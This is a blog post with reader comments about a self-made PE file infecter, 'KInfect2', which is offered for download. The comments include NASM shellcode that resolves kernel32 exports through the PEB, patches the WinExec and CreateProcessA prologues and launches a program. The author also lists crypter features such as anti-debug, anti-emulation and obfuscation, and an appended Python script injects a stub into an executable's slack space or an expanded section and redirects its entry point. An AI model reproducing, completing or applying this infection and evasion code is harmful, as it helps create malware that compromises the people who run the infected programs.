Ok so I spent the last few days revising my PE infecter code.
I’ve uploaded the revised source code along with a release build.
Many improvements have been made, I’m sure you’ll spot a few once you glance over the source code.
Below is a quote of the usage output:
PE File Infecter By KOrUPt @ KOrUPt.co.uk
Usage: KInfect2.exe <stub file> <target file> <infection method>
Infection methods:
's' - Use code section slack space (stealthy but volatile)
'e' - Expand last section (less stealthy and volatile)
'n' - Append a new section (least stealthy but less volatile)
I'll add more infection methods at a later date. Of course you're welcome to add some yourself; adding a new entry to the import table would be a nice exercise (I've purposely left room for improvement).
If you do feel like improving it consider posting a link to the revised code as a comment.
Let me know what you think.
Download link:
korupt.co.uk/KInfect2.rar
KOrUPt.
I'm not quite sure what you mean, Meh. Care to define 'tarp'?
KOrUPt.
Comment by KOrUPt — January 7, 2009 @ 22:17
http://www.itsatarp.com/
Know your meme (aka less DataRescue software, more procrastination): the Rs are wild in internet lingo, they eat Es at the end of words, like twitr, flickr, .. and they keep dancing with vowels in the middle of words, like pr0n and tarp.
I was hinting at the fact that melted was probably going to propose making you an accessory to breaking computer crime laws, for a nominal fee. Mainly for comical effect (the meme bit), and because it's true.
This concludes our OT lesson for today. Feel free to remove my contributions from this post.
Comment by meh — January 8, 2009 @ 02:26
Meh, I wanted to see what he intended to propose. I don't take on many freelancing jobs, and when I do it's only from sources that I can trust.
Either way, thanks for the heads up.
KOrUPt.
Comment by KOrUPt — January 8, 2009 @ 10:32
This is nice, but the problem is how to bypass Windows Data Execution Prevention (DEP) with this technique. Any suggestions? Or maybe you want to share NASM code which is able to do that?
Comment by algla991 — January 22, 2009 @ 17:29
I have tried the following but it does not work:
BITS 32                         ; 32-bit code

section .text
global START, RESETEXPORTNAMETABLE, INITSTRINGTABLE, MOVETHROUGHTABLE
global STRINGSEARCH, Found, DONESTRINGSEARCH, OverWriteCreateProcessA
global OverWriteWinExec, CallWinExec, NOTFOUND, STRINGEXIT, JUMPSTART
global WINEXEC, CREATEPROCESSA, ENDOFTABLE, WinExecOverWrite
global CreateProcessAOverWrite, COMMAND, EXIT

    pusha
    jmp JUMPSTART

START:
    pop ebp                     ; ebp -> length-prefixed API name table (return address pushed by CALL)
    xor eax, eax
    mov al, 0x30
    mov eax, [fs:eax]           ; PEB
    mov eax, [eax+0xc]          ; PEB->Ldr
    mov eax, [eax+0x1c]         ; InInitializationOrderModuleList.Flink (first entry: ntdll)
    mov eax, [eax]              ; next entry (kernel32 on XP/2003 era Windows)
    mov eax, [eax+0x8]          ; DllBase
    movzx ebx, word [eax+3ch]   ; e_lfanew
    mov esi, [eax+ebx+78h]      ; export directory RVA
    lea esi, [eax+esi+18h]      ; esi -> NumberOfNames
    mov ebx, eax                ; ebx = module base
    lodsd
    mov ecx, eax                ; ecx = NumberOfNames
    lodsd
    add eax, ebx
    mov edx, eax                ; edx = AddressOfFunctions
    lodsd
    add eax, ebx                ; eax = AddressOfNames
    push ecx                    ; [esp+4] = NumberOfNames
    push edx                    ; [esp]   = AddressOfFunctions

RESETEXPORTNAMETABLE:
    xor edx, edx                ; edx = index into the name table
INITSTRINGTABLE:
    mov esi, ebp
    inc esi                     ; esi -> name bytes (skip the length byte)
MOVETHROUGHTABLE:
    mov edi, [eax+edx*4]
    add edi, ebx                ; edi -> exported name string
    xor ecx, ecx
    mov cl, BYTE [ebp]          ; cl = length of the wanted name, 0 = end of table
    test cl, cl
    jz DONESTRINGSEARCH
STRINGSEARCH:
    repe cmpsb
    je Found
    cmp [esp+4], edx            ; ran past the last name?
    je NOTFOUND
    inc edx
    jmp INITSTRINGTABLE
Found:
    pop ecx                     ; ecx = AddressOfFunctions
    shl edx, 2
    add edx, ecx
    mov edi, [edx]              ; indexed by the name index directly, not via AddressOfNameOrdinals
    add edi, ebx                ; edi = resolved function address
    push edi                    ; save it
    push ecx                    ; keep AddressOfFunctions on top of the stack
    xor ecx, ecx
    mov cl, BYTE [ebp]
    inc ecx
    add ebp, ecx                ; ebp -> next name entry
    jmp RESETEXPORTNAMETABLE

DONESTRINGSEARCH:
OverWriteCreateProcessA:
    pop edi                     ; discard AddressOfFunctions
    pop edi                     ; edi = CreateProcessA
    push 0x06
    pop ecx
    inc esi                     ; esi -> WinExecOverWrite bytes (skip the length byte)
    rep movsb                   ; write 6 bytes over the start of CreateProcessA
OverWriteWinExec:
    pop edi                     ; edi = WinExec
    push edi
    push 0x06
    pop ecx
    inc esi                     ; esi -> CreateProcessAOverWrite bytes
    rep movsb                   ; write 6 bytes over the start of WinExec
CallWinExec:
    push 0x03                   ; uCmdShow
    push esi                    ; esi -> COMMAND
    call [esp+8]                ; WinExec("calc.exe", 3)
NOTFOUND:
    pop edx
STRINGEXIT:
    pop ecx
    popa
    jmp EXIT

JUMPSTART:
    add esp, 0x1000             ; move esp 0x1000 bytes up before the call
    call START                  ; pushes the address of WINEXEC as the return address

WINEXEC:
    db 0x07, 'WinExec'
CREATEPROCESSA:
    db 0x0e, 'CreateProcessA'
ENDOFTABLE:
    db 0x00
WinExecOverWrite:
    db 0x06, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x54   ; push ebp / mov ebp,esp / sub esp,0x54
CreateProcessAOverWrite:
    db 0x06, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x2c   ; push ebp / mov ebp,esp / push dword [ebp+0x2c]
COMMAND:
    db 'calc.exe', 0x00
EXIT:
    db 0x90, 0x90
Any suggestions ?
Comment by algla991 — January 22, 2009 @ 18:17
My knowledge of DEP is rather limited…
But I don't see how DEP will be much of a problem in this case. You should be able to change the characteristics of a section to make it executable, or alternatively you can just use slack space from within the code section (which already has the executable bit set).
I assume you don’t intend to execute your code on the stack or heap.
Perhaps custom exception handlers may help?
In future please be more specific; comments such as "...it does not work", as I'm sure you can understand, don't provide me with a very good outline of how it is supposed to work or what currently doesn't work.
KOrUPt.
Comment by KOrUPt — January 23, 2009 @ 04:18
It is very nice, but how can I inject C code? Your code injects only asm code, but I don't know asm well, so please reply to me about injection with C code.
Comment by ted — March 3, 2009 @ 09:52
Amazing. Provide the techniques, and still there has to be one that wants it spoon-fed. May as well get them to send you any resources they want included, a 'to do' list which contains only what they want out of the program, and then write it for them... :O
Keep up the good work K.
Comment by Ghandi — May 20, 2009 @ 23:43
Ghandi, well said.
Nice to see you around by the way. I apologise for the late approval of your comment; I've recently switched to another box and I didn't have the Admin CP password stored locally.
Ted, you can write a C inline assembly buffer if you like, or just write C routines (see my initial infecter), but note that the C routines must be relocatable and independent (you can't use APIs). I recommend you learn NASM.
You may be wondering why I chose to create the stub in NASM and not use an inline assembly buffer like I did initially. The answer is simple: extended flexibility... Instead of having to re-compile the whole infecter when I apply a minor update to the stub, I need simply re-compile the stub, and it can be easily updated by myself and others. The actual infecter only needs to be re-compiled should I make a major change to the stub that would require certain tables to be initialized (i.e. ImageBase may need to be hardcoded into the stub).
I may release an updated version of this Infecter sometime this month, as I’m working on a PE protector at the time of writing.
Currently the progress list stands as follows (currently in alpha):
;-------------------------------------------------------------------
; KCrypter Stub V1.0 by (C) KOrUPt @ http://KOrUPt.co.uk.
; This stub is part of the KCrypter project and is not to be re-distributed
; without the author's prior permission...
;
; If you don't know what you're doing do not attempt to modify this stub!
;
; Done:
; TLS table support.
; IAT rebuilding.
; IAT redirection.
; Internal API resolution.
; Anti-Emulation.
; Anti-Dump.
; Anti-debug.
; Junk code obfuscation.
;
; Todo:
; Implement API emulation.
; Implement on-demand decryption (guard pages)
; Implement code section encryption in KCrypter (Arc4)
; Implement red-pill anti emu.
;
; Please send any suggestions and or death threats to: [my email address]
; -- compile with nasm.exe stub.asm
;-------------------------------------------------------------------
If you’ve anything to add, please let me know.
Apologies for the lack of new posts, I’m very very busy trying to juggle around various projects and real life priorities at the moment.
Nice to see a few of you still drop by.
KOrUPt.
Comment by KOrUPt — May 28, 2009 @ 04:01
Hello KOrUPt, I have a boring simple PEex for you to debug (when you have time)! Find the errors in this file; the game: get the file to execute, work out the hidden code, and see if you can find an exploit in the ORIGINAL code!!
Should take a few mins.
Hint:rpc:
http://www.megaupload.com/?d=7OG3THT7
Comment by melwtec35 — May 29, 2009 @ 02:18
Hello, can you please post some more information on this topic? I would like to read more.
Comment by GarykPatton — June 16, 2009 @ 01:43
Hey Korupt, I was examining the source and I'm a little confused on something... InfectionHelper.cpp line 168: Wouldn't using GetFileSize on the handle from CreateFile return the original size of the file? Therefore, writing to GetFileSize - dwStubSize would be overwriting part of the original PE file, wouldn't it?
Comment by C++Noob — August 15, 2009 @ 07:55
Gary, what kind of further information are you looking for? Please be specific. Thanks in advance.
Now, C++Noob…
Take note of the call to UnloadFile() and the LoadFile() call just after: the file is first unloaded and then re-mapped into memory in the expanded form...
lpMapInfo = LoadFile(target, dwStubSize);
This line appends dwStubSize bytes to the file and maps it into memory.
dwWriteOffset = (GetFileSize(lpMapInfo->hFile, NULL)) - dwStubSize;
This line acquires the length of the file including the newly appended null bytes and subtracts the size of the stub in bytes, which leaves exactly enough room at the end of the file to place the stub.
I hope this helps to clarify the issue, if not, please let me know.
Apologies for late approval of comments.
KOrUPt.
Comment by KOrUPt — August 15, 2009 @ 17:07
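Worked example, added to this page and not taken from KInfect2's source or from any commenter: a small Python script that does, on a constructed minimal PE32 image, what the 's' and 'e' methods in the usage output describe and what the two replies above discuss. It reads the section table, finds the code-section slack that is already mapped executable (the point of the DEP reply), and for the expand-last-section case grows the file first and then derives the write offset as new file size minus the appended size (the LoadFile/GetFileSize arithmetic explained above), sets IMAGE_SCN_MEM_EXECUTE on the grown section and redirects the entry point at the stub. The sample image layout, the 32-byte INT3 placeholder stub and the helper names (build_sample_pe, infect_slack, infect_expand, opt_dword) are assumptions made for the example; no original-entry-point handoff is implemented, so the "stub" here would simply trap.

```python
import struct

# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HDR_FMT = "<8sIIIIIIHHI"
SECTION_HDR_SIZE = struct.calcsize(SECTION_HDR_FMT)   # 40
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def build_sample_pe():
    """Constructed minimal PE32 image for this example (not a real program): DOS header,
    PE headers, .text with 0x150 used bytes in a 0x200 raw block (0xB0 slack), .data last."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)          # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)          # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 92, 16)                      # NumberOfRvaAndSizes
    text = struct.pack(SECTION_HDR_FMT, b".text", 0x150, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data = struct.pack(SECTION_HDR_FMT, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    image = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + data).ljust(0x200, b"\0")
    image += (b"\xC3" * 0x150).ljust(0x200, b"\0")           # .text raw data: 0x150 used, 0xB0 slack
    image += (b"A" * 0x100).ljust(0x200, b"\0")              # .data raw data
    return image


def pe_headers(pe):
    """Return (file offset of the optional header, list of section header dicts)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    sections = []
    for i in range(nsect):
        off = opt + opt_size + i * SECTION_HDR_SIZE
        f = struct.unpack_from(SECTION_HDR_FMT, pe, off)
        sections.append({"off": off, "name": f[0].rstrip(b"\0"), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "rawptr": f[4], "chars": f[9]})
    return opt, sections


def opt_dword(pe, field_offset):
    """Read a DWORD field of the optional header (16 = AddressOfEntryPoint, 56 = SizeOfImage)."""
    return struct.unpack_from("<I", pe, pe_headers(pe)[0] + field_offset)[0]


def code_section(pe):
    """The section containing AddressOfEntryPoint, i.e. the executable one method 's' uses."""
    opt, sections = pe_headers(pe)
    entry = struct.unpack_from("<I", pe, opt + 16)[0]
    for s in sections:
        if s["va"] <= entry < s["va"] + max(s["vsize"], s["rawsize"]):
            return opt, s
    raise ValueError("entry point is not inside any section")


def code_slack(pe):
    """Method 's': (file offset, size) of the unused tail of the code section's raw block.
    That space is already mapped executable, so DEP does not get in the way there."""
    _, s = code_section(pe)
    return s["rawptr"] + s["vsize"], s["rawsize"] - s["vsize"]


def infect_slack(pe, stub):
    """Method 's': drop the stub into the slack and point the entry at it."""
    opt, s = code_section(pe)
    off, room = code_slack(pe)
    if len(stub) > room:
        raise ValueError("stub of %d bytes does not fit in %d bytes of slack" % (len(stub), room))
    out = bytearray(pe)
    out[off:off + len(stub)] = stub
    struct.pack_into("<I", out, s["off"] + 8, s["vsize"] + len(stub))   # VirtualSize now covers the stub
    struct.pack_into("<I", out, opt + 16, s["va"] + s["vsize"])          # entry point -> stub
    return bytes(out), off


def infect_expand(pe, stub):
    """Method 'e': grow the file by an aligned stub-sized block, then write at
    (new size - appended size), which is the old end of file.  The last section is
    enlarged, marked executable and the entry point is redirected to the stub."""
    opt, sections = pe_headers(pe)
    last = sections[-1]
    sect_align, file_align = struct.unpack_from("<II", pe, opt + 32)
    if len(pe) != last["rawptr"] + last["rawsize"]:
        raise ValueError("data after the last section (overlay) is not handled here")
    grow = align_up(len(stub), file_align)
    out = bytearray(pe) + b"\0" * grow
    write_off = len(out) - grow                  # same arithmetic as GetFileSize() - dwStubSize
    out[write_off:write_off + len(stub)] = stub
    new_vsize = last["rawsize"] + len(stub)      # the stub sits past the old raw block
    struct.pack_into("<I", out, last["off"] + 8, new_vsize)
    struct.pack_into("<I", out, last["off"] + 16, last["rawsize"] + grow)
    struct.pack_into("<I", out, last["off"] + 36, last["chars"] | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
    struct.pack_into("<I", out, opt + 16, last["va"] + last["rawsize"])
    struct.pack_into("<I", out, opt + 56, align_up(last["va"] + new_vsize, sect_align))
    return bytes(out), write_off


if __name__ == "__main__":
    pe = build_sample_pe()
    stub = b"\xCC" * 0x20                        # placeholder stub: 32 INT3 bytes, not real code
    print("code slack at 0x%x, %d bytes" % code_slack(pe))
    for name, fn in (("s", infect_slack), ("e", infect_expand)):
        new, off = fn(pe, stub)
        print("method %s: stub at 0x%x, entry 0x%x, file size 0x%x" % (name, off, opt_dword(new, 16), len(new)))
```

The example pads the appended block to FileAlignment so the grown SizeOfRawData stays aligned; the reply above describes KInfect2 appending exactly dwStubSize bytes, so the offset arithmetic is the same but the padding is this example's choice. A usable stub would also have to save the original AddressOfEntryPoint before it is overwritten and jump back to it, which this example deliberately leaves out.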
KOrUPt thanks for sharing it with us.
I need your help though; I tried to infect an exe packed with UPX, and now it does not start at all. It says "Error executing program". Do you have any idea why?
Thanks in advance.
Comment by Bill — February 5, 2010 @ 15:26